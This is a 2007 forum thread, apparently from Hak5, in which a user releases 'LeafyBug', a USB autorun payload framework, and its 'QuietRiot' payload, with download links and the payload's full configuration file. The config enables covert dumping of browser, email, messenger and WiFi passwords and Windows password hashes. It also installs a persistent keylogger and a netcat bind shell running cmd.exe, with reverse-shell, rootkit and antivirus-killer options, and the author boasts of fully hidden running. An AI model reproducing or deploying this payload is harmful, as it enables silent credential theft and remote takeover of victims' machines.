Jump to content

The LeafyBug Framework & QuietRiot v2.1.5 Payload


twsSentinel
 Share

Recommended Posts

The LeafyBug - A new advancement based off the SwitchBlabe PoC.

Update: 6.09.2007

Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership to a new startup eBusiness. So that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted. Specifically the "Loader" application; so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off it detects if .NET is installed on the computer, therefor, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload!. I has a few other features to assist in run customization.

Anyway, to no further wait:

http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip                    << Framework exe

http://tws.serveftp.org/software/LeafyBug/...ditor.zip          << Payload Editor

http://tws.serveftp.org/software/LeafyBug/...ource.zip        << C# Source code for the framework

http://tws.serveftp.org/software/LeafyBug/...ogger.zip  << Small .NET Keylogger I made which works x86 & x64. Does not use WinAPI Hooks.

*More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there.

Please guys, accept my apologies on this release. I really intended to have it 100% finished; all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my pc server, so if you want to spread to RapidShare, be my guest. :)


splash.png


What is the LeafyBug?

All this time here at Hak5.org, we've had several U3 Payloads come and go. Most of us found one we liked or created our own. However the LeafyBug brings a whole new aspect to the table. The LeafyBug, is NOT a payload, it is a payload framework which allows you to extend the Switchblade's concept to a greater extent.

Think of it this way, the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files.

lbeditor1.png

lbeditor2.png

The QuietRiot v2.1.5 is the first payload for this new framework.

;*********************************************** *
;* QuietRiot v2.1.5 Modules
;* LeafyBug Payload
;* Date: 5/25/2007
;* Code: _DmG_
;*********************************************** */

;* ********************************************************************************
*********************************** *
;* Creating Custom Modules:
;* 
;* To create a module you must specify certain variables...
;* =-----------------------------------------------------------------------------------------------------------------=
;* |    Var    | Value                                            | Required |
;* =-----------------------------------------------------------------------------------------------------------------=
;*    Enabled  = Enabled or Disabled (Write 'true' or 'false')                            YES
;*    Filename = EXE_NAME("Name of actual exe's name")(Ex. keyLogger.exe, netstat)                YES
;*    Mode     = (Choices either 1,2,3)                                          YES
;*            1 = SystemInfo (Ex. netstat, ipconfig) Used for system executable's only
;*             2 = Executable (The exe will be run from usb device)
;*             3 = Executable (The exe will be copied to target. If RootKit is enabled, it will
;*                   run under its protection.)
;* =-----------------------------------------------------------------------------------------------------------------=
;*    FileDIR  = Path to copy exe to if 'Mode'== 2 or 3 (Default. Leave empty)                       NO
;*    PreArgs  = Custom export args (This string will be sent after the EXE_NAME &amp;                 NO
;*         before the output filename) Nirsoft applications generally use '/stext' to 
;*               output into a log, but some apps require something different. See the 
;*               "Firefox Passwords" module for an example.
;*    PostArgs = Custom export args                                         NO
;*             If Mode == 2: This string will be sent after the output filename. Ex. See "AdapterWatch".
;*             If Mode == 3: Use this string to set the name for the registry key. Ex. See "KeyLogger"
;*    x64      = x64 Flag! (If you know an app is incompatible with x64 OS, than set to "true".             NO
;*         The app wont run.)(Default. Leave empty or false)(See "pwdump" module as an example.)
;*    x64File  = x64 Alternative EXE Support (If you have two executables one for x86, and x64,             NO
;*         you can set the EXE_NAME to the file here.
;*         (See "CurrentPorts" &amp; "WifiKeys" modules as examples.)
;*    Output   = If the application will output text, leave blank or set to true, otherwise, false.         NO
;*         (See "NetCat" or "Keylogger", these programs dont require the app to finish.)
;* =-----------------------------------------------------------------------------------------------------------------=
;* ********************************************************************************
*********************************** *

;PRE-CONFIGURED VARIABLES: Use these to aid in settings.
;
;$DRIVE_DIR$ » Drive the payload executes from.
;$MACHINE_NAME$ » Target computers name.
;$SYSTEM$ » Target computers system32 directory.
;$DATE$ » Date of execution.
;$TIME$ » Time of execution.
;$NC_PORT$ » Port number specified in config file.
;$NC_RVS_IP$ » Reverse shell IP.
;$NC_RVS_PORT$ » Reverse shell port.

[Anti-Virus Killer]
Enabled=false
Filename=
Mode=
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=false

[NetStat]
Enabled=false
Filename=netstat
Mode=1
FileDir=$FILE_DIR$
PreArgs=-n
PostArgs=
x64=
x64File=
Output=

[AdapterWatch]
Enabled=true
Filename=quietriot_awatch.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=/stab
PostArgs=1
x64=
x64File=
Output=

[CurrentPorts]
Enabled=true
Filename=quietriot_cports.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=true
x64File=quietriot_cports64.exe
Output=

[Firefox Passwords]
Enabled=true
Filename=quietriot_FirePassword.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=&gt;&gt;
PostArgs=
x64=
x64File=
Output=

[Internet Explorer]
Enabled=true
Filename=quietriot_iepv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Internet Explorer History]
Enabled=true
Filename=quietriot_iehv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Product Keys]
Enabled=true
Filename=quietriot_ProduKey.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Instant Messenger]
Enabled=true
Filename=quietriot_mspass.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[E-Mail Accounts]
Enabled=true
Filename=quietriot_mailpv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Windows Updates]
Enabled=true
Filename=quietriot_wul.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Protected Storage]
Enabled=true
Filename=quietriot_pspv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[WiFi Keys]
Enabled=true
Filename=quietriot_WirelessKeyView.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=quietriot_WirelessKeyView64.exe
Output=

[KeyLogger]
Enabled=true
Filename=quietriot_NetLogger.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-m hour
PostArgs=MSKL
x64=
x64File=
Output=false

[PwDump]
Enabled=true
Filename=quietriot_pwdump.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=&gt;&gt;
PostArgs=
x64=true
x64File=
Output=

[NetCat BindShell]
Enabled=true
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-L -p $NC_PORT$ -d -e cmd.exe
PostArgs=MSNCBS
x64=
x64File=
Output=false

[NetCat ReverseShell]
Enabled=false
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe
PostArgs=MSNCRS
x64=
x64File=
Output=false

lbeditor3.png


Oooohhh, Aaahhhhh ... What's so damn special about it?!?

No more shell coding, you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just few more quick features to add. Here's why to migrate to the LeafyBug:

  • [li]Full WinOS Compatability and Customization - x86 & x64[/li]

[li]100% hidden running ... other payloads would show up on x64[/li]

[li]LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.[/li]

[li]Auto-Detects  system architecture, allows you to specify 32&64bit apps for each module, and automatically executes the proper one.[/li]

[li]RootKit Ability[/li]

[li]Easy to create, expand, simplify with no code what-so-ever. Add new modules with ease in the editor.[/li]

[li]Customize each module down to a T how it will run and execute.[/li]

[li]Installation is simple, place whatever you want in any drive/directory[/li]

[li]U3 & Non-U3 Compliant[/li]

Link to comment
Share on other sites

Hey guys .. I'll release it either tomorrow, or in the next couple days. There's a couple of things I'd like to see implemented. Also, I have completely lost my U3 Drive (OMG!) sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 Package Installer. Hopefully I'll buy a new drive within a wk.

I'm also still undecided about releasing a rootKit with the QuietRiot. The leafybug has the ability to use the hxdef RK, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see.

On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64 compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs.

Anyways ... thanks for the support guys. Sorry for the wait!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...